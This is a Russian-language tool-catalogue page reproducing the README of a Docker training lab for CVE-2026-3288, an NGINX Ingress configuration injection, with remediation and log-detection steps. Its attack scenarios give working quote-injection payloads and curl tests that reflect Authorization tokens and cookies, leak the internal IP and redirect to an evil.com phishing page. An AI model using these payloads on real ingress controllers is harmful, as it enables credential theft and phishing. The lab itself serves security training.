Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3288-lab — # Docker-лаборатория для изучения уязвимости CVE-2026-3288 NGINX Ingress Лаборатория на базе Docker для отработки инъекции конфигурации NGINX Ingress (CVE-2026-3288), включающая эксплойт-скрипты, мониторинг обнаружения и рекомендации по устранению уязвимости для авторизованного обучения в области безопасности. | Kitploit
Инструменты/GitHubGitHub/bvabhishek/cve-2026-3288-lab
Безопасность облачной инфраструктурыБезопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАудит конфигурацииТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

Репозиторий
165 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

# Docker-лаборатория для изучения уязвимости CVE-2026-3288 NGINX Ingress Лаборатория на базе Docker для отработки инъекции конфигурации NGINX Ingress (CVE-2026-3288), включающая эксплойт-скрипты, мониторинг обнаружения и рекомендации по устранению уязвимости для авторизованного обучения в области безопасности.

Поделиться

CVE-2026-3288 Vulnerable Lab (Docker)

NGINX Ingress Controller Configuration Injection

⚠️ ПРЕДУПРЕЖДЕНИЕ: Эта лаборатория содержит намеренно уязвимые конфигурации ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ОБУЧЕНИЯ ПО БЕЗОПАСНОСТИ

Обзор уязвимости

CVE-2026-3288 (CVSS 8.8 HIGH) — инъекция конфигурации в NGINX Ingress Controller

  • Затронутые версии: < v1.13.8, v1.14.4, v1.15.0
  • Вектор атаки: инъекция двойной кавычки (") в конфигурацию пути
  • Воздействие: удалённое выполнение кода, раскрытие секретов, кража учётных данных
  • Связано: CVE-2026-24512 (аналогичная инъекция пути)

Корневая причина

Функция buildProxyPass() не очищает входные данные пути перед их интерполяцией в конфигурацию nginx, что позволяет злоумышленникам выйти за пределы строк в кавычках и внедрить произвольные директивы nginx.

Компоненты лаборатории

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # Этот файл
├── docker-compose.yml                 # Основная настройка лаборатории
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # Настройка уязвимого NGINX
│   │   ├── nginx.conf                # Базовая конфигурация
│   │   └── vulnerable-config.conf    # Уязвимая обработка путей
│   └── backend/
│       ├── Dockerfile                # Простое бэкенд-приложение
│       └── app.py                    # Приложение Flask
├── exploits/
│   ├── exploit.py                    # Автоматизированный скрипт эксплуатации
│   ├── payloads.txt                  # Коллекция эксплойт-пейлоадов
│   └── test-exploits.sh              # Тестирование всех эксплойтов
├── detection/
│   └── monitor-logs.sh               # Мониторинг попыток эксплуатации
└── cleanup/
    └── cleanup.sh                    # Удаление всех ресурсов лаборатории

Предварительные требования

  • Установленный Docker
  • Установленный Docker Compose
  • Python 3.6+ (для скриптов эксплуатации)
  • curl или wget
  • Минимум 2 ГБ ОЗУ

Быстрый старт

1. Запуск лаборатории

root@kitploit:~
cd CVE-2026-3288-lab

# Запуск уязвимого окружения
docker-compose up -d

# Проверка статуса
docker-compose ps

2. Проверка установки

root@kitploit:~
# Проверка работы бэкенда
curl http://localhost:8080/

# Проверка работы NGINX
curl http://localhost/

3. Запуск эксплойтов

root@kitploit:~
cd exploits

# Автоматизированная эксплуатация
python3 exploit.py --all

# Или тестирование отдельных эксплойтов
bash test-exploits.sh

4. Мониторинг логов

root@kitploit:~
# Просмотр логов NGINX на предмет эксплуатации
docker-compose logs -f nginx

# Мониторинг обнаружения
cd detection
bash monitor-logs.sh

5. Очистка

root@kitploit:~
docker-compose down -v

Сценарии атак

Сценарий 1: Перехват ответа

Инъекция директивы return в nginx для отдачи контента, контролируемого злоумышленником.

Пейлоад:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

Тест:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

Сценарий 2: Кража учётных данных

Отражение заголовков Authorization в ответе для кражи Bearer-токенов.

Пейлоад:

root@kitploit:~
/login" return 200 "Token: $http_authorization

Тест:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

Сценарий 3: Фишинговый редирект

Перенаправление пользователей на фишинговый сайт, контролируемый злоумышленником.

Пейлоад:

root@kitploit:~
/" return 302 "https://evil.com/phishing

Тест:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

Сценарий 4: Раскрытие внутреннего IP

Утечка информации о внутреннем сервере.

Пейлоад:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

Тест:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

Сценарий 5: Кража cookie

Кража сессионных cookie.

Пейлоад:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

Тест:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

Как это работает

Уязвимый шаблон кода

root@kitploit:~
# Уязвимая конфигурация
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

Эксплуатация

Когда путь содержит ", это разрывает строку в кавычках:

root@kitploit:~
# Ввод злоумышленника: /api" return 200 "HACKED
# Результат:
location ~ "^/api" return 200 "HACKED" {
    # Исходная конфигурация теперь нарушена
}

Обнаружение

Мониторинг логов

root@kitploit:~
# Поиск подозрительных шаблонов
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

Ручное обнаружение

root@kitploit:~
# Проверка конфигурации NGINX на внедрённые директивы
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

Устранение

Немедленные действия

  1. Проверка входных данных — очистка всех входных данных пути
  2. Экранирование специальных символов — правильное экранирование " и \
  3. Использование белых списков — разрешать только заведомо безопасные пути
  4. Мониторинг логов — оповещение о подозрительных шаблонах

Исправление кода

root@kitploit:~
// До (уязвимо)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// После (исправлено)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

Цели обучения

После завершения этой лаборатории вы поймёте:

  1. ✅ Как работают уязвимости инъекции конфигурации
  2. ✅ Влияние недостаточной очистки входных данных
  3. ✅ Множественные техники эксплуатации
  4. ✅ Методы обнаружения через анализ логов
  5. ✅ Правильные стратегии устранения

Устранение неполадок

Контейнеры не запускаются

root@kitploit:~
# Проверка логов
docker-compose logs

# Перезапуск
docker-compose restart

Порт уже занят

root@kitploit:~
# Изменение портов в docker-compose.yml
# Или остановка конфликтующих сервисов
sudo lsof -i :80

Эксплойты не работают

root@kitploit:~
# Проверка работы NGINX
docker-compose ps nginx

# Проверка конфигурации NGINX
docker exec cve-2026-3288-nginx nginx -t

Уведомление о безопасности

  • ⚠️ ТОЛЬКО использование в изолированных лабораторных средах
  • ⚠️ НИКОГДА не разворачивать на производственных системах
  • ⚠️ НИКОГДА не открывать доступ в интернет
  • ⚠️ Убедитесь в наличии надлежащей авторизации перед тестированием
  • ⚠️ Соблюдайте практики ответственного раскрытия уязвимостей

Ссылки

  • Консультация по CVE-2026-3288
  • Исправление PR #14667
  • Анализ Sysdig

Создано исключительно для авторизованного обучения по безопасности и исследовательских целей

Скачать инструмент